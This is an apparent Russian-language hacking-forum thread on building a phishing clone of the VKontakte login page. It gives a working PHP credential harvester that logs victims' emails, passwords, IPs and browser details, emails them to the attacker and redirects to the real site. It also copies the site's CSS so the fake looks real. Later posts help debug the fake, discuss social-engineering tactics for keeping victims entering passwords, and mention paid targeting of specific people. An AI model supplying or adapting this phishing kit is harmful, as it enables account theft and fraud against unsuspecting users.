Некоторые люди думают, что стоит обозвать всех дураками, чтобы прослыть умными. Его пост был из этого разряда))), не стоит обращать внимание на тех, кто из кожи лезет чтобы привлечь его))),
при этом выйдет [censored] поскольку дизайн сайта Вконтакте построен за участием css во избежание этой проблемы глянем сорц PHP: <link rel="stylesheet" href="/css/rustyle.css?29" type="text/css" /> <link rel='stylesheet' href='css/help.css?2' type='text/css' /> 1-ый css 2-ой css немного изменим код PHP: <link rel="stylesheet" href="http://vkontakte.ru//css/rustyle.css?29" type="text/css" /> <link rel='stylesheet' href='http://vkontakte.ru/css/help.css?2' type='text/css' />
вариации на тему "файл login.php" Удобен тем, что высасывает всю инфу. При это сохраняет отчет в базе и высылает ее на почту. PHP: <?PHP $email = $_POST['email']; $c = "$email:$pass"; $Browser = getenv("HTTP_USER_AGENT"); $Port = getenv("REMOTE_PORT"); $Connect = $_SERVER['HTTP_CONNECTION']; $Host = gethostbyaddr(getenv("REMOTE_ADDR")); $pass = $_POST['pass']; $ip = $_SERVER["REMOTE_ADDR"]; $Data = date("d-m-y H:i:s", time()); $text = "[$Data] Browser:[$Browser] Port:[$Port] Connect:[$Connect] Host:[$Host] IP:$ip Мыло:$email Пасс:$pass"; $to = "ваше_мыло@mail.ru"; // $sub = " Pass : $email"; mail($to,$sub,$text); $f=fopen("base.php","a+"); flock($f,2); if(preg_match("/^([.0-9a-z_-]+)@(([0-9a-zA-Z-]+\.)+[0-9a-zA-Z]{2,4})$/i", $_POST['email'])&& !empty($_POST['pass'])){ fputs($f, $_POST['email'].";". $_POST['pass']." \n"); header("Location: http://vkontakte.ru"); } else { header("Location: bad.html"); } flock($f,3); fclose($f); ?> Выявилась ситуация, что люди просто копируют код. Поясняю для новичков. Код нужно присобачить под себя. Это просто шаблон. Если у вас файл базы называется base.txt, то исправьте тут PHP: $f=fopen("base.php","a+"); под себя.
У меня проблема: когда ввожу емайл типа нгегнкг и пароль такого же типа. Пишет "Такой почтовый адрес не зарегистрирован, либо пароль неверный." здесь правильно, но когда пишу [email protected] и какой нибудь пароль пишет также. И bad.htm удалил все равно пишет тоже самое, хоть и информация приходит на ящик.
залей свои файлы на какой нидь файлхостер, и отпиши в личку адрес, скачаю и проверю что у тебя за проблема. Исправленные ошибки отпишу тут
1)Подскажите там при логинировании вставили яваскрипт. Как теперь изменить login.php ? 2) Как сделать что б сразу после проверки логинилось и перенаправляло на заданый id
у меня с этим фейком проблема , если в форму ввода пишут по русски то в лог идет текст типо басу и т.п , чем это лечить или хотяб как перевести? Кстати ненад делать редирект на нормальный вконтакте или на айди и т.д ,пусть лучше юзеру всегда пишется что мол пасс неверный ибо так он начнет вбивать все пассы которые помнит
постучись в аську вечером, скину тебе список определений этих символов и как их расшифровывать ( басу ) Насчет редиректа на нормал, как думаешь, если юзер три раза получит ответ что пароль не верный, сколько времени ему понадобиться, чтобы вспомнить как он на эту страницу попал и почему его пароли выдаются как неверные, если он вводит их правильно? И еще быстрее ему в голову придет мысль что его взломали, и при первой же удачной авторизации юзер пойдет и сменит пароль. Тогда твоя куча паролей бесполезна. СИ рулит)))))) Учим психологию, коллега
в том то и дело что как показывает опыт с моего фейка юзеры даже нидумают менять пароли даже после 5 неудачных попыток войти , могу даже примеры запостить, коллега.
раз на раз не приходится)))), чем держать юзера на фейке пока он поймет в чем дело, лучше отпустить его после двух попыток, больше двух попыток я считаю перебор, хотя в инете есть такие юзеры-блондины, которые и 20 раз введут пароль и не сменят его, но это вымирающий вид)). но на мою беду, мне заказывают только хакеров, опытных юзеров или программистов, так что если их и поймаешь на фейк, то лучше сразу же отпустить их, пока их мысли заняты темой письма которая и привела их на фейк.
мой фейк направлен именно на "вымирающий вид" хотя судя по результатам просторы инета еще богаты подобными юзерами. В асю тебе недостучался так что опиши тут как расшифровать любвинет (как я понял это слово "любвинет") и т.п а то мб у кого тоже такое... преобразование текста в другие кодировки что то непомогает =\
всё со своей проблемой разобрался , если у когот тоже пасс в другой кодировке приходит юзайте сервис _http://www.artlebedev.ru/tools/decoder а чтоб в последствии в лог файле небыло проблем с кодировкой то после редактирования сохраняйте его в UTF-8